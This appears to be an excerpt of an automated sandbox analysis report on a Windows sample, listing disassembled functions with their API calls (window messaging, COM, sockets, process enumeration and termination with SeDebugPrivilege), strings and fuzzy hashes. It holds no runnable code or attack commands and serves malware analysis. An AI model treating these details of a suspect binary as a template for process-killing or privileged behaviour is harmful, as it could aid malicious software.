Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24

Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
_memset.LIBCMT ref: 00479813
_memset.LIBCMT ref: 00479956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
CoTaskMemFree.OLE32(?), ref: 0047998D

Strings

NULL Pointer assignment, xrefs: 004799DB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5

Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
_wcscat.LIBCMT ref: 00486EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2

Strings

SysListView32, xrefs: 00486DF6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68

Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
GetLastError.KERNEL32 ref: 0047E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
GetLastError.KERNEL32(00000000), ref: 0047EA6E
CloseHandle.KERNEL32(00000000), ref: 0047EAA3

Strings

SeDebugPrivilege, xrefs: 0047E9C2

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99

Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00463033

Strings

warning, xrefs: 0046301C
blank, xrefs: 00462FB5
question, xrefs: 00462FEC
info, xrefs: 00462FD4
stop, xrefs: 00463004

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE

Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
LoadStringW.USER32(00000000), ref: 00464319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
LoadStringW.USER32(00000000), ref: 00464336
_wprintf.LIBCMT ref: 0046435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00464357

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79

Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetSystemMetrics.USER32(0000000F), ref: 0048D47C
GetSystemMetrics.USER32(0000000F), ref: 0048D49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
ShowWindow.USER32(00000003,00000000), ref: 0048D735
InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54

Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction ID: 9bc26204a44dec3219c5fdbddb2daa96843464872a345c1f9b74dd9d2987fb79
Opcode Fuzzy Hash: 58d7e91fded017a6e0efb4e40d8d562d2957b08ffb939ead570b381b4f40fd88
Instruction Fuzzy Hash: 514111307046809ADF755B298ECCB6F7791AB45304F14887FE047B26E0CABDA846DB2D

Function 004670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD

Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
EnterCriticalSection.KERNEL32(?), ref: 00467130
_memmove.LIBCMT ref: 0046717E
_memmove.LIBCMT ref: 0046719B
LeaveCriticalSection.KERNEL32(?), ref: 004671AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: afb406dbd2be9d4a7f11f53614fe015c4fbe63102b141997cec2d1305d9ec3c3
Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
Opcode Fuzzy Hash: afb406dbd2be9d4a7f11f53614fe015c4fbe63102b141997cec2d1305d9ec3c3
Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9

Function 004861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004861EB
GetDC.USER32(00000000), ref: 004861F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
ReleaseDC.USER32(00000000,00000000), ref: 0048620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68

Function 0046EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_wcstok.LIBCMT ref: 0046EC94
_wcscpy.LIBCMT ref: 0046ED23
_memset.LIBCMT ref: 0046ED56

Strings

X, xrefs: 0046ED93

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: a56a084b8b4a01d2fb602c2c37a2110a471070e1633dca65706d8e1c1431c908
Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
Opcode Fuzzy Hash: a56a084b8b4a01d2fb602c2c37a2110a471070e1633dca65706d8e1c1431c908
Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B

Function 00476B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
WSAGetLastError.WSOCK32(00000000), ref: 00476C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
inet_ntoa.WSOCK32(?), ref: 00476CA7

Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815

_strlen.LIBCMT ref: 00476D44
_memmove.LIBCMT ref: 00476DAD

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: eb063af499b28503b1661a002f02a4245d1d84fb7d81a0d2f90fb921427c51ed
Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
Opcode Fuzzy Hash: eb063af499b28503b1661a002f02a4245d1d84fb7d81a0d2f90fb921427c51ed
Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59

Function 00401424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9

Function 0048B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00C32910), ref: 0048B3EB
IsWindowEnabled.USER32(00C32910), ref: 0048B3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
SendMessageW.USER32(00C32910,000000B0,?,?), ref: 0048B512
IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
GetWindowLongW.USER32(00C32910,000000EC), ref: 0048B571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98

Function 0047F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047F448
_memset.LIBCMT ref: 0047F511
ShellExecuteExW.SHELL32(?), ref: 0047F556

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

GetProcessId.KERNEL32(00000000), ref: 0047F5CD
CloseHandle.KERNEL32(00000000), ref: 0047F5FC

Strings

@, xrefs: 0047F525

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

